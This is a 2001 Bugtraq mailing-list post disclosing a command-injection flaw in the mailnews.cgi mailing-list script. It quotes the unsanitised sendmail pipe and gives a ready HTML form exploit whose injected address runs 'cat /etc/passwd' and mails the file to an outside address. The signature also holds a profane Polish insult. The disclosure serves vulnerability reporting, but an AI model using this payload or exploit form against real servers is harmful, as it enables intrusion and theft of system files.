Bugtraq mailing list archives
CGI - mailnews.cgi vulnerability...
From: Kanedaaa Bohater <kaneda () AC PL>
Date: Sun, 18 Feb 2001 22:04:54 +0000
Hello BuGReaders... ##Script: mailnews.cgi ##Introduction: <cat from source> CGI-Script MAILNEWS 1.3 This script helps you to maintain a mailinglist. </cat> ##Tested Version: 1.1, 1.3 Author dont parse some characters and he use very stupid "password protection". We can add or delete users from maillist without known admin password. But this is small problem ;] . Lets see what we can do more. <cat source> open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n"; </cat> where $mailprog [default] is sendmail and $member is users from usersfile. Now we can do something like this. Add user "; cat /etc/passwd | mail adam () malysz pl' and use subroutine to execute this code :] Simple exploit in html: <HTML> <BODY> <FORM ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST> <INPUT type=hidden NAME="action" value="subscribe"> <BR> User to add with ; [ex:" ; cat /etc/passwd |mail adam () malysz pl" without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT"> <INPUT TYPE="SUBMIT" VALUE="Submit"> </FORM> <BR> <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news"> Execute command :] </A> <CENTER> Peace... </CENTER> </BODY> </HTML> Who : Kanedaaa kaneda () ac pl ***$$$### " I moze bardzo wielu nie zrozumie tych slow... Ale nie ma litosci dla SKURWYSYNOW .... " ###$$* kaneda () ac pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..
Current thread:
- CGI - mailnews.cgi vulnerability... Kanedaaa Bohater (Feb 19)